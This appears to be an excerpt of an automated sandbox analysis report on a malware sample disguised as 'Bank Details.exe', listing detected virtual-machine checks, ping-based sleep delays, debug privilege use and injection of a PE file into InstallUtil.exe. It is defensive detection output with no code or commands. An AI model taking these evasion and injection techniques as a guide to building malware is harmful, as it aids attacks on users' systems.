                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: Bank Details.exe PID: 7720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: udo.exe PID: 3004, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Uses ping.exe to sleep
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 41
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 41
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 41Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 41Jump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeMemory allocated: 1790000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeMemory allocated: 3340000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeMemory allocated: 17F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeMemory allocated: 16E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeMemory allocated: 3270000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeMemory allocated: 1840000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeMemory allocated: 8310000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeMemory allocated: 9310000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeMemory allocated: 94D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeMemory allocated: A4D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeMemory allocated: A860000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeMemory allocated: B860000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeMemory allocated: C860000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2880000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2AE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2900000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: C70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 2830000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 2570000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 1610000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 3340000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 3150000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\udo.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeWindow / User API: threadDelayed 2995Jump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeWindow / User API: threadDelayed 6845Jump to behavior
                      Source: C:\Users\user\Desktop\udo.exeWindow / User API: threadDelayed 2319Jump to behavior
                      Source: C:\Users\user\Desktop\udo.exeWindow / User API: threadDelayed 7513Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 7027Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2816Jump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exe TID: 8000Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exe TID: 8000Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\PING.EXE TID: 7156Thread sleep count: 39 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\PING.EXE TID: 7156Thread sleep time: -39000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\PING.EXE TID: 1212Thread sleep count: 39 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\PING.EXE TID: 1212Thread sleep time: -39000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\udo.exe TID: 4192Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\udo.exe TID: 4192Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep count: 38 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4704Thread sleep count: 7027 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -99891s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4704Thread sleep count: 2816 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -99766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -99656s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -99547s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -99438s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -99313s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -99188s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -99063s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -98953s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -98844s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -98719s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -98605s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -98493s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -98375s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -98185s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -98035s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -97906s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -97794s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -97687s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -97578s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -97469s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -97359s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -97250s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -97141s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -97031s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -96922s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -96812s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -96703s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -96594s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -96484s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -96375s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -96266s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -96141s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -96016s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -95906s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -95797s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -95687s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -95576s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -95452s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -95337s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -95179s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -95063s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -94937s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -94828s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -94719s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -94594s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -94484s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -94375s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -94264s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -94156s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7240Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7640Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                      Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                      Source: C:\Users\user\Desktop\Bank Details.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeThread delayed: delay time: 30000Jump to behavior
                      Source: C:\Users\user\Desktop\udo.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\udo.exeThread delayed: delay time: 30000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99891Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99547Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99438Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99313Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99188Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99063Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98953Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98844Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98719Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98605Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98493Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98375Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98185Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98035Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97906Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97794Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97687Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97578Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97469Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97359Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97250Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97141Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97031Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96922Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96812Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96703Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96594Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96484Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96375Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96266Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96141Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96016Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95906Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95797Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95687Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95576Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95452Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95337Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95179Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95063Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94937Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94828Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94719Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94594Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94484Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94375Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94264Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94156Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: Bank Details.exe, 00000000.00000002.1710996442.0000000001528000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\W
                      Source: Bank Details.exe, 00000000.00000002.1713067974.0000000004529000.00000004.00000800.00020000.00000000.sdmp, Bank Details.exe, 00000000.00000002.1715433973.0000000006550000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: VBoxTray
                      Source: Bank Details.exe, 00000000.00000002.1715954481.000000000671F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}p
                      Source: InstallUtil.exe, 00000012.00000002.3830643488.0000000005E80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: Bank Details.exe, 00000000.00000002.1715433973.0000000006550000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: 2051979379GSOFTWARE\VMware, Inc.\VMware VGAuth
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\udo.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 730000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\udo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 730000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\udo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 730000Jump to behavior
                      Source: C:\Users\user\Desktop\udo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 732000Jump to behavior
                      Source: C:\Users\user\Desktop\udo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 76E000Jump to behavior
                      Source: C:\Users\user\Desktop\udo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 770000Jump to behavior
                      Source: C:\Users\user\Desktop\udo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 50A008Jump to behavior
                      Source: C:\Users\user\Desktop\udo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\udo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\udo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\Desktop\udo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000Jump to behavior
